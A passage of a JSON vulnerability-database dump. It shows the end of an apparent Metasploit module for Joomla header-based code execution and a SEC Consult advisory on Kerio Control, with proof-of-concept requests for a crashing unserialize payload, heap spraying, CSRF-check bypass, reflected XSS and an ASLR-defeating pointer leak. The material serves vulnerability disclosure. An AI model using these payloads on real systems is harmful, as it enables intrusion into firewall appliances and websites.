target_uri.path, \n'headers' => { datastore['HEADER'] => get_payload(header_name) } \n}) \nfail_with(Failure::Unknown, 'No response') if res.nil? \nsession_cookie = res.get_cookies \nsend_request_cgi({ \n'method' => 'GET', \n'uri' => target_uri.path, \n'cookie' => session_cookie, \n'headers' => { \nheader_name => Rex::Text.encode_base64(payload.encoded) \n} \n}) \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/134949/joomla_http_header_rce.rb.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:25:29", "description": "", "cvss3": {}, "published": "2016-09-22T00:00:00", "type": "packetstorm", "title": "Kerio Control Unified Threat Management Code Execution / XSS / Memory Corruption", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-5771", "CVE-2015-6834", "CVE-2014-3515", "CVE-2014-8142", "CVE-2016-5773", "CVE-2015-0231"], "modified": "2016-09-22T00:00:00", "id": "PACKETSTORM:138812", "href": "https://packetstormsecurity.com/files/138812/Kerio-Control-Unified-Threat-Management-Code-Execution-XSS-Memory-Corruption.html", "sourceData": "`SEC Consult has also released a blog post describing the attack scenarios \nof the vulnerabilities within this advisory in detail and a video which \nshows the remote attack. Exploit code has been developed as well but will \nnot be released for now. 
\n \nBlog: \nhttp://blog.sec-consult.com/2016/09/controlling-kerio-control-when-your.html \n \nVideo: \nhttps://www.youtube.com/watch?v=y_OWz25sHMI \n \n \nSEC Consult Vulnerability Lab Security Advisory < 20160922-0 > \n======================================================================= \ntitle: Potential backdoor access through multiple vulnerabilities \nproduct: Kerio Control Unified Threat Management \nvulnerable version: <9.1.3, verified in version 9.1.0 build 1087 and 9.1.1 \nbuild 1324 \nfixed version: 9.1.3 (partially fixed, see vendor statement below) \nCVE number: - \nimpact: critical \nhomepage: http://www.kerio.com/ \nfound: 2016-08-24 \nby: R. Freingruber (Office Vienna) \nR. Tavakoli (Office Vienna) \nSEC Consult Vulnerability Lab \n \nAn integrated part of SEC Consult \nBangkok - Berlin - Linz - Montreal - Moscow \nSingapore - Vienna (HQ) - Vilnius - Zurich \n \nhttps://www.sec-consult.com \n \n======================================================================= \n \nVendor description: \n------------------- \n\"Protect your network from viruses, malware and malicious activity \nwith Kerio Control, the easy-to-administer yet powerful all-in-one \nsecurity solution. \nKerio Control brings together next-generation firewall capabilities - \nincluding a network firewall and router, intrusion detection and \nprevention (IPS), gateway anti-virus, VPN, and web contentand \napplication filtering. These comprehensive capabilities and unmatched \ndeployment flexibility make Kerio Control the ideal choice for small \nand mid-sized businesses.\" \n \nSource: http://www.kerio.com/products/kerio-control \n \n \nBusiness recommendation: \n------------------------ \nBy combining the vulnerabilities documented in this advisory an attacker \ncan fully compromise a network which uses the Kerio Control appliance for \nprotection. \n \nThe attacker can trick a victim to visit a malicious website which then conducts \nthe internal attack. 
The attacked victim must be logged in or weak credentials \nmust be configured which can be found with a bruteforce attack. \n \nThe attacker will gain a reverse root shell from the Internet to the internal \nKerio Control firewall system. Moreover, it's possible that an internal attacker \nuses the described vulnerabilities to escalate his privileges (low privileged \naccount to full root shell) to steal credentials from other users on the UTM \nappliance. \n \nMost vulnerabilities (RCE, CSRF bypasses, XSS, Heap Spraying) were found \nin just two PHP scripts. Both scripts are not referenced by any other \nPHP script nor by any binary on the system. \nBoth scripts contain a different(!), seemingly deliberate(?) CSRF bypass \nwhich make the vulnerabilities exploitable from the Internet to obtain a \nreverse root shell. \n \nSEC Consult recommends not to use Kerio Control until a thorough security \nreview has been performed by security professionals and all identified \nissues have been resolved. \n \n \nVulnerability overview/description: \n----------------------------------- \n1) Unsafe usage of the PHP unserialize function and outdated PHP version leads \nto remote-code-execution \nAn authenticated user (standard user or administrator) can control data, which \ngets later unserialized. Kerio Control uses PHP 5.2.13 which was released on \n2010-02-25. This version is more than 6 years old and several bugs were found \nin the meantime within the unserialize function. The following CVE numbers \nare just some examples for vulnerabilities in unserialize which lead to remote \ncode execution: \n-) CVE-2014-8142 \n-) CVE-2014-3515 \n-) CVE-2015-0231 \n-) CVE-2015-6834 \n-) CVE-2016-5771 \n-) CVE-2016-5773 \n \nPHP 5.2.13 is especially affected by CVE-2014-3515. This vulnerability uses a \ntype confusion attack to trigger a use-after-free vulnerability. It can be used \nto read data and get full code execution. 
In the case of Kerio Control the \nresult of unserialize is not reflected back to the attacker. It's therefore not \npossible to read memory from the stack or heap (e.g. to bypass ASLR). \n \nNevertheless, SEC Consult developed a fully working and reliable (blind) exploit \nfor this vulnerability which spawns a reverse root shell to the Kerio Control \nsystem. \nFor this exploit a user account is required. However, it's also possible to \nconduct the attack via the Internet because the CSRF (Cross Site Request \nForgery) check can be bypassed (see below). \n \nAn attacker can use this vulnerability to break into a company network via the \nInternet by tricking a logged in user to visit a malicious website. Even if the \nuser is currently not logged in the attacker can start a bruteforce attack to \nobtain valid credentials to conduct the attack. \n \n \n2) PHP script allows heap spraying \nOne of the PHP scripts allows the allocation of memory inside the main binary \n(winroute) of Kerio Control. Winroute contains the code of most services \n(e.g. the webserver, PHP, network related functionality, ...). \nThe memory will not be freed after finishing the request and can therefore be \nused to spray payloads to the whole memory space. \n \nThis vulnerability was used in the overall exploit to defeat ASLR. \nPlease bear in mind that it's very likely that an attacker can write a working \nexploit without heap spraying. Fixing this vulnerability would therefore not \nprevent the exploitation of the remote code execution vulnerability. \nFor example, the information disclosure vulnerability from this advisory can \nbe used to bypass ASLR as well. This would eliminate the need of heap spraying. \n \n \n3) CSRF Protection Bypass \nThe PHP scripts contain code to protect against CSRF (Cross Site Request \nForgery) attacks. Because of the wrong usage of PHP binary \noperations and comparisons it's possible to bypass this check. 
That means \nthat an attacker can trigger requests from other websites which will be handled \nby Kerio Control. This vulnerability allows the remote code \nexecution vulnerability to be exploited from the Internet to break into a network. \n \n \n4) Webserver running with root privileges \nThe main binary (which contains the webserver and PHP) runs with root \nprivileges. \n \nKerio told SEC Consult that this vulnerability will not be fixed. SEC \nConsult strongly recommended otherwise. \n \n \n5) Reflected Cross Site Scripting (XSS) \nKerio Control does not properly encode parameters which are reflected on the \nwebsite. This leads to cross site scripting vulnerabilities. \nAn attacker can abuse these vulnerabilities to modify the website or perform actions \nin the context of the attacked user. \n \n \n6) Missing memory corruption protections \nThe main binary (winroute) is not compiled as a position-independent executable \n(PIE). This allowed the use of ROP (return-oriented-programming) code to \nbypass the non-executable heap. Moreover, the stack is by default marked as \nexecutable, but the exact location of the stack is randomized by ASLR. \n \n \n7) Information Disclosure leads to ASLR bypass \nOne of the PHP scripts leaks pointers to the stack and heap. \nThis can be abused by attackers to bypass ASLR. \nBecause stacks are marked as executable an attacker can therefore easily bypass \nASLR and DEP/NX. \n \n \n8) Remote Code Execution as administrator \nNearly a year ago on 2015-10-12 Raschin Tavakoli reported a remote code \nexecution vulnerability in the administrative web interface in the upgrade \nfunctionality. This vulnerability is still unfixed, only the associated XSS \nvulnerability was fixed. However, an attacker can still exploit it from the \nInternet, e.g. by abusing the XSS vulnerability described in this advisory \n(where the CSRF check can be bypassed). 
\n \nWith this vulnerability an attacker can gain a reverse root shell on \nKerio Control again if a logged in administrator visits a malicious website \non the Internet. \nMore information can also be found in the old advisory: \nhttps://www.exploit-db.com/exploits/38450/ \n \n \n9) Login not protected against brute-force attacks \nThere are no bruteforce protections in place for the login. \nIf an unauthenticated victim visits an attacker's website, the attacker can \nstart a bruteforce attack to obtain valid credentials to execute the \nremote code execution exploit. Via image-loading the attacker can detect if \nthe current credentials are valid (without violating SOP). \n \n \nProof of concept: \n----------------- \n1) Unsafe usage of the PHP unserialize function and outdated PHP version leads \nto remote-code-execution \nThe following request can be used to set the unserialize data. In this example \na faked string is used which points to 0xffffffff (kernel memory). Unserializing \nit will therefore crash the remote webserver (the winroute process). 
\n \nPOST /set.php HTTP/1.1 \nHost: $IP:4081 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nCookie: SESSION_CONTROL_WEBIFACE=<valid session ID>; \nConnection: close \nContent-Type: application/x-www-form-urlencoded \nContent-Length: 730 \n \nk_securityHash=x&target=k_sessionVariable&k_variable=lastDisplayed&k_value=a:18:{s:8:\"k_dbName\";s:5:\"error\";s:11:\"k_dbSummara\";s:3:\"abc\";s:14:\"k_dbIndividual\";s:3:\"abc\";s:16:\"k_dbLastUsedType\";s:3:\"abc\";s:10:\"k_dbLayout\";s:3:\"abc\";s:10:\"k_pageType\";s:3:\"abc\";s:13:\"k_periodStart\";i:123;s:11:\"k_periodEnd\";i:123;s:8:\"k_userId\";i:123;s:6:\"tabBar\";i:123;s:13:\"k_gotoElement\";i:123;s:9:\"k_protoId\";i:123;s:11:\"k_errorType\";i:123;s:16:\"k_timezoneOffset\";i:123;s:9:\"k_groupId\";i:123;s:2:\"id\";i:123;s:11:\"k_dbSummary\";C:16:\"SplObjectStorage\":152:{x:i:2;O:8:\"stdClass\":1:{i:0;a:2:{i:1;i:1;i:2;i:2;}};d:2.0851592721051977e-262;;m:a:2:{i:0;S:15:\"\\ff\\ff\\ff\\ff\\20\\00\\00\\00\\01\\00\\00\\00\\06\\00\\00\";i:1;R:3;}}s:18:\"k_historyTimestamp\";s:3:\"abc\";} \n \nThe following request will call unserialize on the injected data: \n \nGET /contentLoader.php?k_getHistoryId=1&k_securityHash=x HTTP/1.1 \nHost: $IP:4081 \nCookie: SESSION_CONTROL_WEBIFACE=<valid session ID>; \nConnection: close \n \nIn the example above only a denial of service will be conducted. However, an \nattacker can change the data type to object to get full code execution on \nthe remote system. \n \nSEC Consult developed a fully working exploit for this attack which spawns a \nroot shell. Please note that this exploit was intentionally written to just \ntarget Kerio Control 9.1.0 Build 1087. This is because hardcoded offsets \nare used which belong to the winroute binary with the SHA256 hash: \n2808c35528b9a4713b91f65a881dfca03088de08b6331fdee1c698523bd757b0 \nThis exploit will not be released for now. 
\n \nA real-world-attacker can detect the remote binary version by bruteforcing \nthe object handler related to CVE-2014-3515. \n \n \n2) PHP script allows heap spraying \nThe set.php script contains the following code: \n$p_variable = urldecode($_POST['k_variable']); \n$p_value = urldecode($_POST['k_value']); \n... \n$p_session->setSessionVariable($p_variable, $p_value); \n \nPOST requests with the following parameters can therefore be used to allocate \nspace on the remote system: \nk_securityHash=x&target=k_sessionVariable&k_variable=<random_name> \n&k_value=<payload_to_allocate> \n \nDuring tests it was possible to spray approximately 400 MB data in 30 seconds \nwhich is enough to control two predictable addresses on the heap. \n \n \n3) CSRF Protection Bypass \nTwo scripts are required for the remote code execution exploit: \n-) set.php \n-) contentLoader.php \nBoth scripts contain different very interesting CSRF check bypasses. \n \nThe following code can be found in set.php: \n$p_session->getCsrfToken(&$p_securityHash); \n$p_postedHash = $_GET['k_securityHash'] || $_POST['k_securityHash']; \nif ('' == $p_postedHash || ($p_postedHash != $p_securityHash)) { \nexit(); \n} \n \nSince the programming language is PHP (and not JavaScript), the above code \ndoes not work as expected. $p_postedHash can only become 0 or 1 (strictly, the \nbooleans false or true) because || is a \nlogical operator. The if-condition compares the valid token with the posted one \nvia the != operator, however, this will not check if types are the same. \nIf k_securityHash is set (either via GET or POST) to any value, the above code \nwill compare the number 1 (boolean true) with a string; the loose comparison \nconverts the non-empty token string to true as well, which will always bypass the check. \nIt's therefore enough to set k_securityHash to any value to bypass the CSRF \nprotection. A correct check would read the submitted value itself (not the \nresult of ||) and compare it to the token with the strict !== operator. \n \nThe following code can be found in contentLoader.php: \n$p_session->getCsrfToken(&$p_securityHash); \n$p_postedHash = $_GET['k_securityHash']; \n... 
\nif (!$p_session || ('' == $p_postedHash && $p_postedHash != $p_securityHash)) { \n$p_page = new p_Page(); \n$p_page->p_jsCode('window.top.location = \"index.php\";'); \n$p_page->p_showPageCode(); \ndie(); \n} \n \nNow the programmers only use the GET parameter, however, they changed the \nlogical operator in the if condition from || to && which means that the CSRF \ncheck will only be applied if $p_postedHash is empty. It's therefore again \nenough to set k_securityHash to any value to bypass the check. \n \n \n4) Webserver running with root privileges \nNo proof of concept necessary. \n \n \n5) Reflected Cross Site Scripting (XSS) \nIn the following request the k_historyTimestamp parameter is prone to XSS: \nhttps://<IP>:4081/contentLoader.php?k_dbName=x&k_securityHash=x \n&k_historyTimestamp=aa%22;alert(1)%3b// \n \nIn the same request the id parameter can be used to inject JavaScript code. \nNote that the attack can only be conducted against administrative users. \nUsers with standard privileges can only access pages with k_dbName set to one \nof the following values: \n-) accStats \n-) prefs \n-) dialup \n-) error \n \nIn such a case Kerio Control adds code like the following \n(in this example k_dbName=dialup): \nvar k_newDbName = \"<kerio:text id=\"tabCaption_dialup\"/>\"; \n \nThe \" characters within the string are not correctly encoded. \nThis will lead to the termination of the JavaScript execution. Because the \ninjected payload is stored after this code, the attacker must bypass this \ncode to ensure that the payload gets executed. This is only possible if \nthe attacked user is an administrator because administrators can load any \ndbName. By setting k_dbName to an invalid dbName (e.g. 
to 'x'), code like \nthe following will be added instead (which does not crash): \nvar k_newDbName = \"\"; \n \nAnother XSS can be found at: \nhttps://<IP>:4081/admin/internal/dologin.php?hash=%0D%0A\"><script>alert(1);</script><!-- \n \n \n6) Missing memory corruption protections \nNo proof of concept necessary. \n \n \n7) Information Disclosure leads to ASLR bypass \nThe following request returns information to the currently logged in user \n(e.g. session token and username): \n \nGET /nonauth/getLoginType.js.php HTTP/1.1 \nHost: $IP:4081 \nCookie: SESSION_CONTROL_WEBIFACE=<valid session ID>; \nConnection: close \n \nThe following is a typical response: \n \nHTTP/1.1 200 OK \nConnection: Close \nContent-type: text/html \nDate: Tue, 24 Aug 2016 11:47:34 GMT \nServer: Kerio Control Embedded Web Server \nX-UA-Compatible: IE=edge \n \nk_loginParams.k_loginType = \"loginUnlock\";k_loginParams.k_nonauthToken = \n\"0xb59066a8\";k_loginParams.k_sessionToken = \n\"bc7c9ae78f01e498b7c935b4ad521b664d4e2c5574bde30cdf57851a58763660\";k_loginParams.k_loggedUser \n= {k_asocName: \"user\", k_fullName: \"user\"}; \n \nThe above response contains a valid pointer (0xb59066a8). In most cases this \npointer will point to the heap. However, sometimes this pointer will point \ninto a readable and writeable region behind a stack-region. \nThe target location always stores the same data. During the analysis no \nfurther effort was spent on analysing this behaviour. \n \nThe pointer will also be disclosed if the user is already l